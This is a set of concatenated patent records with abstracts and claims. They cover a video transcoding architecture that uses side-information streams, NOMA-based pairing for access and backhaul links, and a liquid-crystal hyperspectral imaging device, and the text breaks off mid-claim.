decreasing or increasing the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about video quality indicates that the video quality has decreased or increased, respectively. 35. The method of claim 22, further comprising:
receiving reports from the user device being served by a first of the one or more video transcoder devices, wherein each of the reports includes a corresponding update to the VPC configuration of the user device; and in response to each of the reports, updating a target picture resolution used by the first video transcoder device to perform said transcoding of the encoded video stream. 36. The method of claim 22, wherein the VPC configuration of each user device includes an identification of a video coding format requested by the user device, wherein said transcoding of the encoded video stream is performed so that the respective target encoded video stream conforms to the requested video coding format. 37. The method of claim 22, wherein the VPC configuration of each user device includes an identification of a target picture resolution requested by the user device, wherein said transcoding of the encoded video stream is performed so that the respective target encoded video stream has the requested target picture resolution. 38. The method of claim 22, wherein the VPC configuration of each user device includes an identification of a target bit rate requested by the user device, wherein said transcoding of the encoded video stream is performed so that the respective target encoded video stream has an average output bit rate approximately equal to the requested target bit rate. 39. The method of claim 22, further comprising:
storing the target encoded video stream generated by a given one of the one or more video transcoder devices that has been assigned to serve a first of the user devices; and directing a transmission of the stored target encoded video stream to a second user device in response to detecting that the second user device has a same or similar VPC configuration as the first user device. 40. A video encoder comprising:
digital circuitry configured to perform, for each of a plurality of blocks of an input video stream, operations including: transforming a plurality of prediction residuals that correspond respectively to one or more coding modes in order to obtain one or more respective transform blocks for the one or more respective coding modes; for each coding mode Mk, processing the respective prediction residual and/or the respective transform block for the coding mode Mk to obtain rate modeling data for the coding mode Mk; transmission circuitry configured to transmit a side information stream onto a communication medium, wherein the side information stream includes the rate modeling data for each coding mode and for each block. 41. The video encoder of claim 40, wherein the rate modeling data includes data characterizing a rate estimation function Rk(q) for at least one of the one or more coding modes, wherein q represents quantization step size. 42. The video encoder of claim 40, wherein the operations also include:
for each coding mode Mk, generating one or more reconstruction residuals based respectively on one or more quantized versions of the transform block for that coding mode, and generating distortion modeling data for the coding mode based on the one or more reconstruction residuals, wherein the side information stream also includes the distortion modeling data for each coding mode and each block. 43. The video encoder of claim 42, wherein the distortion modeling data includes data characterizing a distortion estimation function Dk(q) for at least one of the one or more coding modes, wherein q represents quantization step size. 44. The video encoder of claim 40, wherein the digital circuitry is further configured to generate an encoded video stream that represents an encoded version of the input video stream, wherein the transmission circuitry is configured to transmit the encoded video stream onto the communication medium. 45. The video encoder of claim 44, wherein said generating the encoded video stream includes operating on at least one of the one or more transform blocks. 46. A video encoder comprising:
digital circuitry configured to encode an input video stream to obtain an encoded video stream, wherein said encoding includes generating a side information stream that characterizes properties of the input video stream; and transmission circuitry configured to transmit the encoded video stream and the side information stream. 47. The video encoder of claim 46, wherein the side information stream includes data characterizing rate and/or distortion properties of the input video stream. 48. The video encoder of claim 46, wherein the side information stream includes a stream of candidate motion vectors. 49. A video transcoding system comprising:
a decoder configured to receive and decode a first encoded video stream to obtain a decoded video stream; a scaling unit configured to scale the decoded video stream to a target picture resolution in order to obtain a scaled video stream; an output encoder configured to receive a side information stream associated with the first encoded video stream, and encode the scaled video stream using the side information stream in order to obtain a second encoded video stream. 50. The video transcoding system of claim 49, wherein the first encoded video stream is an encoded version of a source video stream, wherein the side information stream includes metadata that characterizes properties of the source video stream. 51. The video transcoding system of claim 49, wherein the target picture resolution is lower than a picture resolution implicit in the first encoded video stream. 52. The video transcoding system of claim 49, wherein the side information stream includes N rate information streams corresponding to N respective coding modes, wherein N is greater than or equal to one, wherein each rate information stream RISk of the N rate information streams characterizes a corresponding rate estimation function Rk(q) per block of the first encoded video stream assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 53. The video transcoding system of claim 52, wherein N=2 for a given coded picture of the first encoded video stream, wherein the rate information stream RIS1 corresponds to an intra coding mode, wherein the rate information stream RIS2 corresponds to an inter coding mode. 54. The video transcoding system of claim 52, wherein each rate information stream RISk characterizes the rate estimation function Rk(q) for each block with a corresponding set of one or more fitting parameters associated with a continuous functional model. 55. 
The video transcoding system of claim 49, wherein the side information stream includes N distortion information streams corresponding to N respective coding modes, wherein N is greater than or equal to one, wherein each distortion information stream DISk of the N distortion information streams characterizes a corresponding distortion estimation function Dk(q) per block of the first encoded video stream assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 56. The video transcoding system of claim 55, wherein N=2 for a given coded picture of the first encoded video stream, wherein the distortion information stream DIS1 corresponds to an intra coding mode, wherein the distortion information stream DIS2 corresponds to an inter coding mode. 57. The video transcoding system of claim 55, wherein each distortion information stream DISk characterizes the distortion estimation function Dk(q) for each block with a corresponding set of one or more fitting parameters associated with a continuous functional model. 58. The video transcoding system of claim 49, wherein the output encoder is configured to process the side information stream in order to obtain an aggregate rate estimation function RA(q) for each frame of the scaled video stream, wherein q represents quantization step size. 59. The video transcoding system of claim 58, wherein the output encoder is configured to further process the side information stream in order to obtain an aggregate distortion estimation function DA(q) for each frame of the scaled video stream. 60. The video transcoding system of claim 49, wherein the side information stream includes one or more candidate motion vectors for each block of the first encoded video stream, wherein the output encoder is configured to perform a fine-resolution motion vector refinement for each block that is restricted to one or more neighborhoods in motion vector space based on the one or more candidate motion vectors. 61. 
The video transcoding system of claim 49, wherein said decoder is configured to recover a motion vector for each block from the first encoded video stream as part of said decoding the first encoded video stream, wherein the output encoder is configured to perform a motion vector refinement for each block that is restricted to a neighborhood in motion vector space based on the motion vector for the block. 62. The video transcoding system of claim 49, wherein the side information includes one or more candidate motion vectors per block, wherein said encoding the scaled video stream includes selecting a motion vector from a set of vectors including the one or more candidate motion vectors. 63. The video transcoding system of claim 62, wherein the set of vectors also includes a decoded motion vector recovered from the first encoded video stream. 64. The video transcoding system of claim 49, further comprising:
transmission circuitry configured to transmit the second encoded video stream to a remote decoder through a communication medium. 65. The video transcoding system of claim 49, wherein the output encoder is configured to receive auxiliary information and inject the auxiliary information into the scaled video stream, wherein the auxiliary information includes one or more of:
branding information of a business entity; advertising information; digital rights management (DRM) information; digital information providing watermark functionality; customized features requested by a content provider, content delivery service provider, customer or user. 66. The video transcoding system of claim 49, wherein at least one of the decoder, the scaling unit and the output encoder is implemented using software configured for execution on an array of parallel processors. 67. The video transcoding system of claim 49, wherein the decoder, the scaling unit, the output encoder are implemented on distinct subsets of processors in an array of parallel processors. | A split architecture for encoding a video stream. A source encoder may encode a video content stream to obtain an encoded bitstream and a side information stream. The side information stream includes information characterizing rate and/or distortion estimation functions per block of the video content stream. Also, a different set of estimation functions may be included per coding mode. The encoded bitstream and side information stream may be received by a video transcoder, which transcodes the encoded bitstream to a client-requested picture resolution, according to a client-requested video format and bit rate. The side information stream allows the transcoder to efficient and compactly perform rate control for its output bitstream, which is transmitted to the client device. This split architecture may be especially useful to operators of content delivery networks.1. A system comprising:
a memory that stores a collection of video content items, wherein each of the video content items includes a corresponding encoded video stream and corresponding side information stream; one or more video transcoder devices; and a controller, wherein, in response to each of a plurality of content requests for a given one of the video content items from a respective plurality of user devices, the controller is configured to assign an available one of the one or more video transcoder devices to serve the respective user device, wherein the user devices have respectively different configurations of video processing capability (VPC), wherein each assigned video transcoder device is configured to: receive the encoded video stream and side information stream of the given video content item; and transcode the encoded video stream using the side information stream and according to the VPC configuration of the respective user device, in order to obtain a respective target encoded video stream; and transmit the respective target encoded video stream to the respective user device through a communication medium. 2. The system of claim 1, wherein the encoded video stream of the given video content item is an encoded version of a given source video stream, wherein the side information stream includes metadata that characterizes properties of the given source video stream. 3. The system of claim 2, wherein the metadata includes one or more candidate motion vectors per block of the encoded video stream of the given content item. 4. The system of claim 2, wherein the metadata includes rate modeling data per block of the encoded video stream of the given content item. 5. The system of claim 2, wherein the metadata includes distortion modeling data per block of the encoded video stream of the given content item. 6. The system of claim 1, wherein the communication medium is a wireless transmission medium. 7. 
The system of claim 6, wherein at least one of the one or more video transcoder devices is coupled to or incorporated as part of a base station of a wireless communication network, wherein one or more of the user devices are configured for wireless communication with the base station. 8. The system of claim 1, wherein the controller is configured to assign a first of the one or more video transcoder devices to different ones of the user devices at different times. 9. The system of claim 1, further comprising:
a source encoder configured to encode source video streams to generate respective ones of the content items, wherein each of the one or more video transcoder devices is more power efficient than the source encoder, and/or more space efficient than the source encoder. 10. The system of claim 1, wherein the side information stream of each video content item includes one or more rate information streams corresponding to one or more respective coding modes, wherein each rate information stream RISk of the one or more rate information streams characterizes a corresponding rate estimation function Rk(q) per block of the corresponding encoded video stream, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 11. The system of claim 1, wherein the side information stream of each video content item includes one or more distortion information streams corresponding to one or more respective coding modes, wherein each distortion information stream DISk of the one or more distortion information streams characterizes a corresponding distortion function Dk(q) per block of the encoded video stream of the video content item, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 12. The system of claim 1, wherein a first of the one or more video transcoder devices is configured to perform said transcoding by:
decoding the encoded video stream to obtain a decoded video stream; scaling the decoded video stream to a target picture resolution of the respective user device, in order to obtain a scaled video stream; and encoding the scaled video stream using the side information and according to the VPC configuration of the respective user device, in order to obtain the respective target encoded video stream. 13. The system of claim 12, wherein the controller is configured to:
receive reports from the user device being served by the first video transcoder device, wherein each of the reports includes analytical information from the user device; and in response to each of the reports, update a target bit rate and/or the target picture resolution used by the first video transcoder device to encode the scaled video stream. 14. The system of claim 13, wherein the analytical information includes information about quality of a link between the first video transcoder device and the user device. 15. The system of claim 14, wherein the controller is configured to decrease or increase the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about link quality indicates that the link quality has decreased or increased, respectively. 16. The system of claim 13, wherein the analytical information includes information about the quality of video recovered from the respective target encoded video stream transmitted by the first video transcoder device. 17. The system of claim 16, wherein the controller is configured to decrease or increase the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about video quality indicates that the video quality has decreased or increased, respectively. 18. The system of claim 12, wherein the controller is configured to:
receive reports from the user device being served by the first video transcoder device, wherein each of the reports includes a corresponding update to the VPC configuration of the user device; and in response to each of the reports, update the target picture resolution used by the first video transcoder device to encode the scaled video stream. 19. The system of claim 1, wherein the VPC configuration of each user device includes an identification of one or more of:
a video coding format requested by the user device; and a target picture resolution requested by the user device. 20. The system of claim 1, wherein the VPC configurations of the respective user devices span an M-dimensional configuration space, wherein M is at least two, wherein the M-dimensional configuration space has at least a first dimension corresponding to a choice of video format and a second dimension corresponding to a selection of picture resolution. 21. The system of claim 1, wherein the controller is configured to:
store the target encoded video stream generated by a given one of the one or more video transcoder devices that has been assigned to serve a first of the user devices; and direct a transmission of the stored target encoded video stream to a second user device in response to detecting that the second user device has a same or similar VPC configuration as the first user device. 22. A method for delivering video content to user devices, the method comprising:
storing a collection of video content items in a memory, wherein each of the video content items includes a corresponding encoded video stream and corresponding side information stream; in response to each of a plurality of content requests for a given one of the video content items from a respective plurality of remote user devices, assigning an available one of one or more video transcoder devices to serve the respective user device, wherein the user devices have respectively different configurations of video processing capability (VPC); utilizing each assigned video transcoder device to: receive the encoded video stream and side information stream of the given video content item; transcode the encoded video stream using the side information stream and according to the VPC configuration of the respective user device, in order to obtain a respective target encoded video stream; and transmit the respective target encoded video stream to the respective user device through a communication medium. 23. The method of claim 22, wherein the encoded video stream of the given video content item is an encoded version of a given source video stream, wherein the side information stream includes metadata that characterizes properties of the given source video stream. 24. The method of claim 23, wherein the metadata includes one or more candidate motion vectors per block of the encoded video stream of the given video content item. 25. The method of claim 23 wherein the metadata includes rate modeling data per block of the encoded video stream of the given video content item. 26. The method of claim 23, wherein the metadata includes distortion modeling data per block of the encoded video stream of the given video content item. 27. 
The method of claim 22, wherein the side information stream of each video content item includes one or more rate information streams corresponding to one or more respective coding modes, wherein each rate information stream RISk of the one or more rate information streams characterizes a corresponding rate estimation function Rk(q) per block of the corresponding encoded video stream, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 28. The method of claim 22, wherein the side information stream of each video content item includes one or more distortion information streams corresponding to one or more respective coding modes, wherein each distortion information stream DISk of the one or more distortion information streams characterizes a corresponding distortion function Dk(q) per block of the encoded video stream of the given video content item, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 29. The method of claim 22, further comprising:
encoding source video streams to generate respective ones of the content items, wherein said encoding the source video stream is performed by a source encoder, wherein each of the video transcoder devices consumes less power than the source encoder, and occupies less space than the source encoder. 30. The method of claim 22, further comprising:
receiving reports from the user device being served by a first of the one or more video transcoder devices, wherein each of the reports includes analytical information from the user device; and in response to each of the reports, update a target bit rate and/or the target picture resolution used by the first video transcoder device to perform said transcoding of the encoded video stream. 31. The method of claim 30, wherein the analytical information includes information about quality of a link between the first video transcoder device and the user device. 32. The method of claim 31, further comprising:
decreasing or increasing the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about link quality indicates that the link quality has decreased or increased, respectively. 33. The method of claim 30, wherein the analytical information includes information about the quality of video recovered from the respective target encoded video stream transmitted by the first video transcoder device. 34. The system of claim 33, further comprising:
decreasing or increasing the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about video quality indicates that the video quality has decreased or increased, respectively. 35. The method of claim 22, further comprising:
receiving reports from the user device being served by the first video transcoder device, wherein each of the reports includes a corresponding update to the VPC configuration of the user device; and in response to each of the reports, updating the target picture resolution used by the first video transcoder device to encode the scaled video stream. 36. The method of claim 22, wherein the VPC configuration of each user device includes an identification of a video coding format requested by the user device, wherein said transcoding of the encoded video stream is performed so that the respective target encoded video stream conforms to the requested video coding format. 37. The method of claim 22, wherein the VPC configuration of each user device includes an identification of a target picture resolution requested by the user device, wherein said transcoding of the encoded video stream is performed so that the respective target encoded video stream has the requested target picture resolution. 38. The method of claim 22, wherein the VPC configuration of each user device includes an identification of a target bit rate requested by the user device, wherein said transcoding of the encoded video stream is performed so that the respective target encoded video stream has an average output bit rate approximately equal to the requested target bit rate. 39. The method of claim 22, further comprising:
storing the target encoded video stream generated by a given one of the one or more video transcoder devices that has been assigned to serve a first of the user devices; and directing a transmission of the stored target encoded video stream to a second user device in response to detecting that the second user device has a same or similar VPC configuration as the first user device. 40. A video encoder comprising:
digital circuitry configured to perform, for each of a plurality of blocks of the input video stream, operations including: transforming a plurality of prediction residuals that correspond respectively to one or more coding modes in order to obtain one or more respective transform blocks for the one or more respective coding modes; for each coding mode Mk, processing the respective prediction residual and/or the respective transform block for the coding mode Mk to obtain rate modeling data for the coding mode Mk; transmission circuitry configured to transmit a side information stream onto a communication medium, wherein the side information stream includes the rate modeling data for each coding mode and for each block. 41. The video encoder of claim 40, wherein the rate modeling data includes data characterizing a rate estimation function Rk(q) for at least one of the one or more coding modes, wherein q represents quantization step size. 42. The video encoder of claim 40, wherein the operations also include:
for each coding mode Mk, generating one or more reconstruction residuals based respectively on one or more quantized versions of the transform block for that coding mode, and generating distortion modeling data for the coding mode based on the one or more reconstruction residuals, wherein the side information stream also includes the distortion modeling data for each coding mode and each block. 43. The video encoder of claim 42, wherein the distortion modeling data includes data characterizing a distortion estimation function Dk(q) for at least one of the one or more coding modes, wherein q represents quantization step size. 44. The video encoder of claim 40, wherein the digital circuitry is further configured to generate an encoded video stream that represents an encoded version of the input video stream, wherein the transmission circuitry is configured to transmit the encoded video stream onto the communication medium. 45. The video encoder of claim 44, wherein said generating the encoded video stream includes operating on at least one of the one or more transform blocks. 46. A video encoder comprising:
digital circuitry configured to encode an input video stream to obtain an encoded video stream, wherein said encoding includes generating a side information stream that characterizes properties of the input video stream; and transmission circuitry configured to transmit the encoded video stream and the side information stream. 47. The video encoder of claim 46, wherein the side information stream includes data characterizing rate and/or distortion properties of the input video stream. 48. The video encoder of claim 46, wherein the side information stream includes a stream of candidate motion vectors. 49. A video transcoding system comprising:
a decoder configured to receive and decode a first encoded video stream to obtain a decoded video stream; a scaling unit configured to scale the decoded video stream to a target picture resolution in order to obtain a scaled video stream; an output encoder configured to receive a side information stream associated with the first encoded video stream, and encode the scaled video stream using the side information stream in order to obtain a second encoded video stream. 50. The video transcoding system of claim 49, wherein the first encoded video stream is an encoded version of a source video stream, wherein the side information stream includes metadata that characterizes properties of the source video stream. 51. The video transcoding system of claim 49, wherein the target picture resolution is lower than a picture resolution implicit in the first encoded video stream. 52. The video transcoding system of claim 49, wherein the side information stream includes N rate information streams corresponding to N respective coding modes, wherein N is greater than or equal to one, wherein each rate information stream RISk of the N rate information streams characterizes a corresponding rate estimation function Rk(q) per block of the first encoded video stream assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 53. The video transcoding system of claim 52, wherein N=2 for a given coded picture of the first encoded video stream, wherein the rate information stream RIS1 corresponds to an intra coding mode, wherein the rate information stream RIS2 corresponds to an inter coding mode. 54. The video transcoding system of claim 52, wherein each rate information stream RISk characterizes the rate estimation function Rk(q) for each block with a corresponding set of one or more fitting parameters associated with a continuous functional model. 55. 
The video transcoding system of claim 49, wherein the side information stream includes N distortion information streams corresponding to N respective coding modes, wherein N is greater than or equal to one, wherein each distortion information stream DISk of the N distortion information streams characterizes a corresponding distortion estimation function Dk(q) per block of the first encoded video stream assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 56. The video transcoding system of claim 55, wherein N=2 for a given coded picture of the first encoded video stream, wherein the distortion information stream DIS1 corresponds to an intra coding mode, wherein the distortion information stream DIS2 corresponds to an inter coding mode. 57. The video transcoding system of claim 55, wherein each distortion information stream DISk characterizes the distortion estimation function Dk(q) for each block with a corresponding set of one or more fitting parameters associated with a continuous functional model. 58. The video encoder of claim 49, wherein the output encoder is configured to process the side information stream in order to obtain an aggregate rate estimation function RA(q) for each frame of the scaled video stream, wherein q represents quantization step size. 59. The video encoder of claim 58, wherein the output encoder is configured to further process the side information stream in order to obtain an aggregate distortion estimation function DA(q) for each frame of the scaled video stream. 60. The video transcoding system of claim 49, wherein the side information stream includes one or more candidate motion vectors for each block of the first encoded video stream, wherein the output encoder is configured to perform a fine-resolution motion vector refinement for each block that is restricted to one or more neighborhoods in motion vector space based on the one or more candidate motion vectors. 61. 
The video transcoding system of claim 49, wherein said decoder is configured to recover a motion vector for each block from the first encoded video stream as part of said decoding the first encoded video stream, wherein the output encoder is configured to perform a motion vector refinement for each block that is restricted to a neighborhood in motion vector space based on the motion vector for the block. 62. The video transcoding system of claim 49, wherein the side information includes one or more candidate motion vectors per block, wherein said encoding the scaled video stream includes selecting a motion vector from a set of vectors including the one or more candidate motion vectors. 63. The video transcoding system of claim 62, wherein the set of vectors also include a decoded motion vector recovered from the first encoded video stream. 64. The video transcoding system of claim 49, further comprising:
transmission circuitry configured to transmit the second encoded video stream to a remote decoder through a communication medium. 65. The video transcoding system of claim 49, wherein the output encoder is configured to receive auxiliary information and inject the auxiliary information into the scaled video stream, wherein the auxiliary information includes one or more of:
branding information of a business entity; advertising information; digital rights management (DRM) information; digital information providing watermark functionality; customized features requested by a content provider, content delivery service provider, customer or user. 66. The video transcoding system of claim 49, wherein at least one of the decoder, the scaling unit and the output encoder is implemented using software configured for execution on an array of parallel processors. 67. The video transcoding system of claim 49, wherein the decoder, the scaling unit, the output encoder are implemented on distinct subsets of processors in an array of parallel processors. | 2,400 |
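Claims 52-59 above describe per-block rate estimation functions Rk(q) that are carried in the side information stream as fitting parameters of a continuous functional model, and that the output encoder aggregates into a frame-level RA(q). A minimal sketch of that aggregation and a rate-targeted choice of quantization step size q, assuming a hypothetical power-law model Rk(q) = a·q^(−b) (the claims name no specific functional form, and all function names here are illustrative):

```python
def block_rate(a: float, b: float, q: float) -> float:
    """Per-block rate estimate Rk(q) = a * q**(-b) (hypothetical power-law model)."""
    return a * q ** (-b)


def aggregate_rate(params: list, q: float) -> float:
    """Frame-level aggregate RA(q): sum of per-block estimates at step size q."""
    return sum(block_rate(a, b, q) for a, b in params)


def choose_q(params: list, target_bits: float,
             lo: float = 0.5, hi: float = 128.0, iters: int = 60) -> float:
    """Bisect for the step size whose aggregate frame rate meets target_bits.

    RA(q) is monotonically decreasing in q for positive a, b, so bisection
    over a bracketing interval converges to the rate-matching step size.
    """
    for _ in range(iters):
        mid = 0.5 * (lo + hi)
        if aggregate_rate(params, mid) > target_bits:
            lo = mid  # too many bits -> coarser quantization needed
        else:
            hi = mid
    return 0.5 * (lo + hi)
```

With two blocks parameterized as (a=1000, b=1) and (a=500, b=1), the aggregate is 1500/q, so a 750-bit frame target resolves to q = 2.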
9,193 | 9,193 | 15,767,181 | 2,416 | A method for integrating access and backhaul links, the method includes: obtaining information indicating a data rate requirement for a link between a first AP and a second AP; obtaining information indicating a gain of the link between the first AP and the second AP; computing, using the gain of the link, an achievable data rate for the link between the first AP and the second AP, wherein the achievable data rate is computed based on an OMA scheme; determining that the data rate requirement is greater than the achievable data rate; and as a result of determining that the data rate requirement is greater than the achievable data rate, pairing a first UE with the first AP, such that a NOMA scheme is used for the link between the first AP and second AP and the link between the first AP and the first UE. | 1. A method for adaptively integrating access and backhaul links, the method comprising:
obtaining information indicating a data rate requirement for a link between a first access point, AP, and a second AP; obtaining information indicating a gain of the link between the first AP and the second AP; computing, based on the gain of the link, an achievable data rate for the link between the first AP and the second AP, wherein the achievable data rate is computed based on an orthogonal multiple access, OMA, scheme (e.g., Time Division Multiple Access, TDMA, Frequency Division Multiple Access, FDMA); determining that a condition is true, wherein determining that the condition is true comprises determining that the data rate requirement is greater than the achievable data rate; and as a result of determining that the condition is true, pairing a first user equipment, UE with the first AP, such that a non-orthogonal multiple access, NOMA, scheme is used for the link between the first AP and the second AP and the link between the first AP and the first UE. 2. The method of claim 1, wherein the NOMA scheme is used for one or more of data uplink and/or data downlink. 3. The method of claim 1, wherein
the first AP is scheduled to transmit data to the second AP during a first time slot and using a first set of one or more frequencies, and pairing a first UE with the first AP comprises the second AP scheduling the first UE to transmit data to the second AP during the first time slot and using the first set of frequencies. 4. The method of claim 1, further comprising:
computing, based on the gain of the link, a second achievable data rate for the link between the first AP and the second AP, wherein the second achievable data rate is computed based on a NOMA scheme where the first UE and the first AP are paired; determining that a second condition is true, wherein determining that the second condition is true comprises determining that the data rate requirement is greater than the second achievable data rate; and as a result of determining that the second condition is true, pairing both the first UE and a second UE with the first AP, such that a NOMA scheme is used for the link between the first AP and the second AP, the link between the first AP and the first UE, and the link between the first AP and the second UE. 5. The method of claim 1, wherein pairing the first UE with the first AP further comprises pairing a plurality of other UEs with the first AP, wherein the first UE and the plurality of other UEs are selected to achieve the data rate requirement while minimizing a complexity measure for using the NOMA scheme. 6. The method of claim 5, further comprising obtaining data rate requirements for the plurality of other UEs, and wherein the first UE and the plurality of other UEs are further selected based on the data rate requirements for the plurality of other UEs. 7. The method of claim 1, further comprising:
a first informing step comprising informing the first UE that the first UE is selected to use the NOMA scheme for the link between the first AP and the first UE, wherein the first informing step further comprises sending an indication to the first UE of a beamforming power level. 8. The method of claim 1, further comprising:
a second informing step comprising informing a UE, for each of the first UE and any unpaired UEs, about a timing information for the UE. 9. The method of claim 7, wherein the first informing step further comprises informing each UE that has been paired with the first AP, that the UE is selected to use the NOMA scheme for the link between the first AP to the UE. 10. The method of claim 1, wherein computing, based on the gain, the achievable data rate for the link between the first AP and the second AP, comprises calculating the achievable data rate (RAP1-AP2,OMA) according to:
RAP1-AP2,OMA = α0 log2(1 + Pg/α0) [bit/symbol]
where P is the transmission power of the first AP, g is the gain corresponding to the link between the first AP and the second AP, and α0 is a portion of time allocated for data transfer in the link between the first AP and the second AP. 11. An access point, the access point being adapted to:
obtain information indicating a data rate requirement for a link between a first access point, AP, and a second AP; obtain information indicating a gain of the link between the first AP and the second AP; compute, based on the gain of the link, an achievable data rate for the link between the first AP and the second AP, wherein the achievable data rate is computed based on an orthogonal multiple access, OMA, scheme (e.g., Time Division Multiple Access, TDMA, Frequency Division Multiple Access, FDMA); determine that a condition is true, wherein determining that the condition is true comprises determining that the data rate requirement is greater than the achievable data rate; and as a result of determining that the condition is true, pair a first user equipment, UE with the first AP, such that a non-orthogonal multiple access, NOMA, scheme is used for the link between the first AP and the second AP and the link between the first AP and the first UE. 12. The access point of claim 11, wherein the NOMA scheme is used for one or more of data uplink and/or data downlink. 13. The access point of claim 11, wherein
the first AP is scheduled to transmit data to the second AP during a first time slot and using a first set of one or more frequencies, and pairing a first UE with the first AP comprises the second AP scheduling the first UE to transmit data to the second AP during the first time slot and using the first set of frequencies. 14. The access point of claim 11, further adapted to:
compute, based on the gain of the link, a second achievable data rate for the link between the first AP and the second AP, wherein the second achievable data rate is computed based on a NOMA scheme where the first UE and the first AP are paired; determine that a second condition is true, wherein determining that the second condition is true comprises determining that the data rate requirement is greater than the second achievable data rate; and as a result of determining that the second condition is true, pair both the first UE and a second UE with the first AP, such that a NOMA scheme is used for the link between the first AP and the second AP, the link between the first AP and the first UE, and the link between the first AP and the second UE. 15. The access point of claim 11, wherein pairing the first UE with the first AP further comprises pairing a plurality of other UEs with the first AP, wherein the first UE and the plurality of other UEs are selected to achieve the data rate requirement while minimizing a complexity measure for using the NOMA scheme. 16. (canceled) 17. A computer program, comprising instructions which, when executed on at least one processor of a user equipment, cause the user equipment to carry out the method according to claim 1. 18. A carrier containing the computer program of claim 17, wherein the carrier is one of an electronic signal, optical signal, radio signal, or computer readable storage medium. 
| 2,400 |
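The method of claims 1 and 10 above reduces to a concrete check: compute the OMA-achievable backhaul rate RAP1-AP2,OMA = α0·log2(1 + Pg/α0) and pair a UE with the first AP (switching to a NOMA scheme) only when the data rate requirement exceeds it. A minimal sketch of that decision, with illustrative function names and unit-normalized P, g, and α0 values not taken from the claims:

```python
import math


def oma_achievable_rate(p: float, g: float, alpha0: float) -> float:
    """Achievable OMA rate per claim 10: alpha0 * log2(1 + P*g/alpha0) [bit/symbol].

    p is the transmission power of the first AP, g the backhaul link gain,
    alpha0 the portion of time allocated to the AP1-AP2 link.
    """
    return alpha0 * math.log2(1.0 + p * g / alpha0)


def should_pair_ue(rate_requirement: float, p: float, g: float, alpha0: float) -> bool:
    """Pair a first UE with the first AP (use NOMA) only when the backhaul
    data rate requirement exceeds what the OMA scheme can deliver."""
    return rate_requirement > oma_achievable_rate(p, g, alpha0)
```

For example, with P = 1, g = 3, and α0 = 1 the OMA rate is log2(4) = 2 bit/symbol, so a 2.5 bit/symbol requirement triggers pairing while a 1.5 bit/symbol requirement does not.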
9,194 | 9,194 | 14,527,378 | 2,482 | A method of operating a hyperspectral imaging device includes connecting electrodes on a liquid crystal variable retarder to a voltage source, rotating liquid crystal material in the liquid crystal variable retarder between a first orientation with a certain optical phase delay and a second orientation with a different optical phase delay, receiving a beam of light at an image sensor that has passed through the liquid crystal variable retarder, and producing an output signal from the image sensor. | 1. A method of operating a hyperspectral imaging device, comprising:
connecting electrodes on a liquid crystal variable retarder to a voltage source; switching the liquid crystal variable retarder between a first retardance and a second retardance, wherein the switching occurs within a specified time; receiving a beam of light at an image sensor that has passed through the liquid crystal variable retarder; and producing an output signal from the image sensor. 2. (canceled) 3. (canceled) 4. The method of claim 1, wherein switching the liquid crystal variable retarder comprises:
applying a first set of voltages to the liquid crystal variable retarder to switch the liquid crystal variable retarder to the first retardance; and applying a second set of voltages to the liquid crystal variable retarder to switch the liquid crystal variable retarder from the first retardance to the second retardance. 5. The method of claim 1, wherein the optical phase delay between ordinary and extraordinary rays changes monotonically as the liquid crystal is switched between the first retardance and the second retardance. 6. The method of claim 1, wherein switching the liquid crystal variable retarder comprises:
applying a time varying voltage consisting of frequency components at one of above or below the frequency at which the dielectric anisotropy of the liquid crystal changes sign, then applying a time varying voltage consisting of frequency components at the other of above or below the frequency at which the dielectric anisotropy of the liquid crystal changes sign. 7. The method of claim 1, further comprising applying compensation to mitigate beam walk-off. 8. The method of claim 1, further comprising:
comparing at least two output signals representing two corresponding frames of image data sensed by the image sensor; and determining an adjustment to be made to the output signals to improve image registration. 9. The method of claim 1, wherein producing an output from the image sensor comprises:
collecting sensing responses from pixels in regions on the image sensor; summing the sensing responses; and outputting the summed responses from the image sensor. 10. The method of claim 1, further comprising storing calibration data for the hyperspectral image sensor in a memory. 11. The method of claim 10, further comprising:
measuring a temperature; and using the temperature as an index into a calibration table in which is stored the calibration data. 12. A method of calibrating a hyperspectral imaging device, comprising:
illuminating a hyperspectral imaging sensor with a light source having known spectral properties, wherein the illuminating is repeated across a range of temperatures and times; sampling the light from the light source with the hyperspectral imaging sensor to obtain sampled spectral properties for particular ones of the range of temperatures and times; and calibrating a performance characteristic of the hyperspectral imaging sensor based upon comparing the sampled spectral properties of the light source to the known spectral properties. 13. The method of claim 12, wherein calibrating the performance characteristic comprises calibrating a retardance controller with optical retardance versus applied time-varying voltage. 14. The method of claim 12, wherein calibrating the performance characteristic comprises calibrating a retardance controller with performance versus temperature for the range of temperatures. 15. The method of claim 12, wherein illuminating the hyperspectral imaging sensor with a light source comprises illuminating the hyperspectral imaging sensor with a light source having at least one defined spectral peak. 16. The method of claim 15, further comprising determining an adjustment to outputs of the image sensor based on measured differences between the at least one defined spectral peak and at least one detected spectral peak at the image sensor. 17. The method of claim 16, wherein sampling the light comprises sampling the light from selected regions of the image sensor and using the adjustment to determine a response of a liquid crystal variable retarder in the hyperspectral image sensor. 18. A method of operating a hyperspectral imaging device, comprising:
receiving a light beam at a liquid crystal retarding device; and driving the liquid crystal retarding device with a pre-computed voltage waveform, wherein the voltage waveform is selected to reach a target optical retardance over time for the liquid crystal retarding device. 19. The method of claim 18, further comprising:
